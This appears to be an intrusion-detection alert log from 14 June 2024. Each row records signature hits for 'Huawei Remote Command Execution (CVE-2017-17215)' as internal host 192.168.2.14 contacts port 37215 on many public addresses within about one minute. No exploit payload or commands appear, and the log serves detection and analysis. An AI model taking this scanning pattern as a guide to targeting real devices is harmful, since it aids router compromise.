                                            06/14/24-10:44:29.010002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709237215192.168.2.1441.85.181.81
                                            06/14/24-10:43:50.071340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068437215192.168.2.14197.54.135.165
                                            06/14/24-10:43:39.791815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586637215192.168.2.1441.125.30.145
                                            06/14/24-10:43:36.704720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.14197.45.22.82
                                            06/14/24-10:43:58.275199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040437215192.168.2.14156.53.31.15
                                            06/14/24-10:44:14.684516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275637215192.168.2.14197.54.35.75
                                            06/14/24-10:44:29.011414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932437215192.168.2.1441.8.72.96
                                            06/14/24-10:43:36.725188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731637215192.168.2.14156.70.174.21
                                            06/14/24-10:43:50.111811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450637215192.168.2.14197.70.161.217
                                            06/14/24-10:44:14.682569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378437215192.168.2.14197.89.62.117
                                            06/14/24-10:43:58.276861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141237215192.168.2.1441.66.86.12
                                            06/14/24-10:43:43.970879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609637215192.168.2.14197.127.138.223
                                            06/14/24-10:44:20.828559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173237215192.168.2.14156.77.197.138
                                            06/14/24-10:44:26.979919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883237215192.168.2.14156.60.247.178
                                            06/14/24-10:44:31.084179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013237215192.168.2.14156.222.6.83
                                            06/14/24-10:43:41.849569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797637215192.168.2.14197.127.207.155
                                            06/14/24-10:43:50.115390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297837215192.168.2.1441.151.121.134
                                            06/14/24-10:43:45.988117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792037215192.168.2.14197.232.121.207
                                            06/14/24-10:44:06.472073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520437215192.168.2.1441.8.163.32
                                            06/14/24-10:44:22.861680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761237215192.168.2.1441.66.110.143
                                            06/14/24-10:43:43.970729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370437215192.168.2.14156.79.220.186
                                            06/14/24-10:44:06.452380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991837215192.168.2.14156.108.75.128
                                            06/14/24-10:43:43.972406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786437215192.168.2.14197.186.145.9
                                            06/14/24-10:44:26.997196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044037215192.168.2.14156.196.233.180
                                            06/14/24-10:44:02.365874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003037215192.168.2.14156.56.114.170
                                            06/14/24-10:44:02.367586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168637215192.168.2.14156.179.180.41
                                            06/14/24-10:43:54.183506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589237215192.168.2.14197.148.12.222
                                            06/14/24-10:43:36.705246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723237215192.168.2.14156.211.60.159
                                            06/14/24-10:43:50.073965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545637215192.168.2.1441.110.131.61
                                            06/14/24-10:44:02.384115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759837215192.168.2.1441.170.137.238
                                            06/14/24-10:43:34.663169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534437215192.168.2.14156.169.159.36
                                            06/14/24-10:44:06.450077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741237215192.168.2.1441.255.81.188
                                            06/14/24-10:44:22.881391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016837215192.168.2.1441.144.163.148
                                            06/14/24-10:43:37.763089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023837215192.168.2.1441.205.159.112
                                            06/14/24-10:44:08.504276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618437215192.168.2.14156.200.180.59
                                            06/14/24-10:43:48.017191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727837215192.168.2.1441.225.205.94
                                            06/14/24-10:44:22.880375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096037215192.168.2.1441.105.250.192
                                            06/14/24-10:43:39.790955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605037215192.168.2.1441.44.131.144
                                            06/14/24-10:44:29.023201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255437215192.168.2.1441.77.142.191
                                            06/14/24-10:43:58.277626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5670837215192.168.2.14197.135.25.193
                                            06/14/24-10:44:02.365274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049837215192.168.2.14197.123.8.40
                                            06/14/24-10:43:45.991250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110037215192.168.2.14156.214.116.180
                                            06/14/24-10:44:35.179113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689637215192.168.2.14197.7.69.66
                                            06/14/24-10:44:33.131076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437637215192.168.2.1441.125.1.44
                                            06/14/24-10:44:24.934509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027237215192.168.2.14156.195.169.197
                                            06/14/24-10:44:04.421847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355237215192.168.2.1441.10.13.146
                                            06/14/24-10:43:58.292523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555237215192.168.2.14197.122.116.224
                                            06/14/24-10:44:10.546772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743037215192.168.2.1441.229.27.97
                                            06/14/24-10:44:14.688131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429637215192.168.2.14156.121.71.139
                                            06/14/24-10:43:54.182681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6047837215192.168.2.14156.205.237.221
                                            06/14/24-10:43:36.727269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308637215192.168.2.14156.112.100.135
                                            06/14/24-10:43:36.727419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812437215192.168.2.1441.39.255.122
                                            06/14/24-10:44:24.914348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909037215192.168.2.1441.230.22.35
                                            06/14/24-10:44:10.546806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821237215192.168.2.14156.202.236.59
                                            06/14/24-10:44:14.684775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260437215192.168.2.14197.177.136.214
                                            06/14/24-10:44:35.178015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783237215192.168.2.14197.147.180.66
                                            06/14/24-10:44:08.517630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201637215192.168.2.14156.76.76.23
                                            06/14/24-10:44:12.625500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397437215192.168.2.14197.55.81.76
                                            06/14/24-10:44:00.321567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579037215192.168.2.1441.238.151.104
                                            06/14/24-10:44:10.563111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670237215192.168.2.14156.59.18.141
                                            06/14/24-10:44:26.977705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688037215192.168.2.1441.128.202.42
                                            06/14/24-10:43:50.115741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964437215192.168.2.1441.134.170.222
                                            06/14/24-10:44:02.367546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973037215192.168.2.1441.5.148.164
                                            06/14/24-10:44:08.503865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394437215192.168.2.1441.243.234.167
                                            06/14/24-10:43:48.034072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593837215192.168.2.14197.203.38.123
                                            06/14/24-10:44:33.150031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362837215192.168.2.14156.133.253.177
                                            06/14/24-10:44:24.913907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463437215192.168.2.14197.16.148.124
                                            06/14/24-10:43:52.150456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4551237215192.168.2.14197.205.252.2
                                            06/14/24-10:44:35.176586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785837215192.168.2.14156.188.244.232
                                            06/14/24-10:44:22.883213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196037215192.168.2.14197.239.241.181
                                            06/14/24-10:43:48.022237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717037215192.168.2.14197.127.67.79
                                            06/14/24-10:44:20.828778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293637215192.168.2.14156.38.38.164
                                            06/14/24-10:43:39.813386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723037215192.168.2.1441.72.184.109
                                            06/14/24-10:44:02.383527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896037215192.168.2.1441.98.153.185
                                            06/14/24-10:43:54.183323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881437215192.168.2.14197.217.229.250
                                            06/14/24-10:43:34.675927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654237215192.168.2.1441.104.63.204
                                            06/14/24-10:44:20.806698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987837215192.168.2.1441.104.238.125
                                            06/14/24-10:44:20.828178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400437215192.168.2.14156.20.126.42
                                            06/14/24-10:43:52.150016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439437215192.168.2.14197.4.236.191
                                            06/14/24-10:43:43.943319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774637215192.168.2.1441.92.99.154
                                            06/14/24-10:44:18.776773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671037215192.168.2.14156.240.163.135
                                            06/14/24-10:43:41.846590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861837215192.168.2.14197.197.35.65
                                            06/14/24-10:44:00.325235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094837215192.168.2.14197.213.252.178
                                            06/14/24-10:43:45.967337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006637215192.168.2.14156.105.203.157
                                            06/14/24-10:44:24.914268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654037215192.168.2.1441.130.166.155
                                            06/14/24-10:43:34.663341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970037215192.168.2.14156.205.118.79
                                            06/14/24-10:44:26.980278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298037215192.168.2.14197.13.161.131
                                            06/14/24-10:43:45.967619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501237215192.168.2.14156.64.76.132
                                            06/14/24-10:44:18.761863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760437215192.168.2.1441.144.188.22
                                            06/14/24-10:44:06.452756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977637215192.168.2.14197.78.178.193
                                            06/14/24-10:43:39.791459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027437215192.168.2.14156.6.83.192
                                            06/14/24-10:43:56.229104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856037215192.168.2.14156.18.68.139
                                            06/14/24-10:43:54.203056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346637215192.168.2.1441.81.153.79
                                            06/14/24-10:43:36.723855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485637215192.168.2.1441.224.251.84
                                            06/14/24-10:44:22.880990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346237215192.168.2.14197.199.214.47
                                            06/14/24-10:43:34.662368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011237215192.168.2.1441.68.4.247
                                            06/14/24-10:43:43.941768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678637215192.168.2.14197.81.126.7
                                            06/14/24-10:43:48.021637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386437215192.168.2.14197.101.235.135
                                            06/14/24-10:43:56.230315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983237215192.168.2.14197.97.172.55
                                            06/14/24-10:43:34.663629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388037215192.168.2.1441.103.189.205
                                            06/14/24-10:43:36.701546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3916437215192.168.2.1441.58.105.42
                                            06/14/24-10:44:27.001889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224437215192.168.2.14197.165.240.151
                                            06/14/24-10:43:43.944056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325637215192.168.2.1441.22.219.81
                                            06/14/24-10:43:56.245902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852637215192.168.2.1441.38.44.59
                                            06/14/24-10:44:31.055261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918437215192.168.2.14197.182.0.21
                                            06/14/24-10:44:00.340728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223037215192.168.2.1441.34.94.242
                                            06/14/24-10:43:34.663611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262037215192.168.2.14197.55.64.7
                                            06/14/24-10:44:35.182109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5229437215192.168.2.1441.27.253.7
                                            06/14/24-10:44:10.565161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394237215192.168.2.14156.120.65.169
                                            06/14/24-10:43:48.018479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359237215192.168.2.14197.118.41.65
                                            06/14/24-10:44:02.385605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923237215192.168.2.14156.227.136.110
                                            06/14/24-10:44:24.944141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383237215192.168.2.14156.222.150.92
                                            06/14/24-10:44:02.366246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765637215192.168.2.1441.41.111.239
                                            06/14/24-10:43:45.968057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324837215192.168.2.1441.49.175.69
                                            06/14/24-10:43:34.661180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252637215192.168.2.1441.174.190.39
                                            06/14/24-10:44:14.685159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619037215192.168.2.1441.16.53.126
                                            06/14/24-10:43:52.163952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809637215192.168.2.1441.138.227.162
                                            06/14/24-10:43:41.902425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327637215192.168.2.1441.62.155.68
                                            06/14/24-10:44:04.425074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313837215192.168.2.1441.87.29.77
                                            06/14/24-10:44:24.947040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624637215192.168.2.1441.188.61.137
                                            06/14/24-10:44:08.505025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480037215192.168.2.14197.234.142.18
                                            06/14/24-10:43:39.811604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357637215192.168.2.14156.184.168.68
                                            06/14/24-10:43:39.808285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364837215192.168.2.1441.154.51.247
                                            06/14/24-10:43:58.292351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108037215192.168.2.1441.98.180.15
                                            06/14/24-10:44:16.733595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6039637215192.168.2.1441.151.240.107
                                            06/14/24-10:43:56.244708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5911237215192.168.2.1441.54.235.177
                                            06/14/24-10:44:29.022573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512837215192.168.2.1441.133.44.143
                                            06/14/24-10:44:29.023878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066437215192.168.2.14197.110.106.160
                                            06/14/24-10:44:02.368318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900237215192.168.2.14156.124.184.193
                                            06/14/24-10:43:54.203273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941637215192.168.2.14156.129.28.1
                                            06/14/24-10:43:54.201565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513437215192.168.2.14197.160.20.147
                                            06/14/24-10:43:41.846468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060037215192.168.2.1441.7.213.46
                                            06/14/24-10:44:10.564331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873637215192.168.2.14197.66.35.125
                                            06/14/24-10:44:04.411807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538237215192.168.2.14197.8.110.196
                                            06/14/24-10:44:04.419950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700637215192.168.2.14156.16.108.200
                                            06/14/24-10:44:02.368921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870637215192.168.2.1441.113.24.181
                                            06/14/24-10:43:48.028098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349237215192.168.2.1441.249.84.153
                                            06/14/24-10:44:16.716821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558837215192.168.2.1441.60.59.4
                                            06/14/24-10:44:10.545026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626637215192.168.2.1441.221.254.16
                                            06/14/24-10:43:43.942605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874037215192.168.2.14197.99.153.52
                                            06/14/24-10:43:43.971536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980437215192.168.2.14156.246.216.255
                                            06/14/24-10:44:20.827708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764437215192.168.2.14197.46.58.250
                                            06/14/24-10:44:04.408435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927237215192.168.2.14197.213.70.120
                                            06/14/24-10:44:04.420350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701237215192.168.2.14156.87.239.189
                                            06/14/24-10:44:08.504787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353437215192.168.2.14156.119.102.155
                                            06/14/24-10:43:34.676987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786837215192.168.2.1441.166.144.123
                                            06/14/24-10:43:56.253397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951237215192.168.2.1441.57.232.200
                                            06/14/24-10:44:12.643825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907437215192.168.2.14197.233.206.140
                                            06/14/24-10:44:18.763467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903437215192.168.2.1441.87.176.0
                                            06/14/24-10:43:41.848161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226837215192.168.2.1441.5.179.179
                                            06/14/24-10:44:33.152405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047437215192.168.2.14197.177.163.66
                                            06/14/24-10:43:34.660480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353437215192.168.2.1441.131.181.63
                                            06/14/24-10:44:00.344448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390637215192.168.2.14197.247.43.244
                                            06/14/24-10:44:02.368728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365837215192.168.2.14156.228.15.171
                                            06/14/24-10:43:50.069811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098437215192.168.2.14197.224.229.207
                                            06/14/24-10:43:52.147006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542837215192.168.2.14197.211.111.178
                                            06/14/24-10:44:10.565882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533037215192.168.2.1441.142.5.244
                                            06/14/24-10:44:00.326358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707837215192.168.2.1441.26.114.102
                                            06/14/24-10:43:52.146906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071637215192.168.2.1441.52.2.120
                                            06/14/24-10:44:29.023329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900037215192.168.2.14197.21.203.27
                                            06/14/24-10:44:14.686691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296037215192.168.2.14156.235.187.201
                                            06/14/24-10:43:36.723990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755637215192.168.2.1441.20.95.37
                                            06/14/24-10:43:36.722087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310237215192.168.2.14156.176.170.105
                                            06/14/24-10:44:12.642755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050637215192.168.2.14156.105.227.79
                                            06/14/24-10:43:54.184836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715637215192.168.2.1441.142.174.173
                                            06/14/24-10:43:48.015704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786837215192.168.2.14156.98.165.111
                                            06/14/24-10:43:58.295150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959237215192.168.2.14197.119.32.8
                                            06/14/24-10:44:27.002097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620437215192.168.2.14197.79.151.125
                                            06/14/24-10:43:52.145819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184837215192.168.2.1441.69.47.252
                                            06/14/24-10:43:48.034633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470637215192.168.2.14197.66.13.220
                                            06/14/24-10:43:56.230960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435237215192.168.2.14156.142.239.217
                                            06/14/24-10:43:48.016156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718837215192.168.2.14197.114.145.138
                                            06/14/24-10:43:48.034319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404237215192.168.2.1441.147.17.251
                                            06/14/24-10:44:00.341755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489837215192.168.2.14156.220.101.207
                                            06/14/24-10:44:29.012217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814637215192.168.2.1441.56.214.187
                                            06/14/24-10:44:02.365714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.14156.183.45.103
                                            06/14/24-10:43:54.183445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887837215192.168.2.14197.195.177.199
                                            06/14/24-10:43:48.033323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568637215192.168.2.14156.189.173.243
                                            06/14/24-10:44:04.421113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14197.133.245.7
                                            06/14/24-10:44:06.470032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286037215192.168.2.14197.211.103.136
                                            06/14/24-10:43:34.662099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774837215192.168.2.1441.229.62.31
                                            06/14/24-10:44:29.022683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3622037215192.168.2.1441.155.29.42
                                            06/14/24-10:44:22.879813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576837215192.168.2.14197.61.197.140
                                            06/14/24-10:43:48.017115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133237215192.168.2.1441.145.164.88
                                            06/14/24-10:43:39.790036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489637215192.168.2.1441.119.2.223
                                            06/14/24-10:43:48.018092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302637215192.168.2.14197.157.153.35
                                            06/14/24-10:43:37.760980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685637215192.168.2.14156.210.142.71
                                            06/14/24-10:43:36.727171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187037215192.168.2.1441.93.142.79
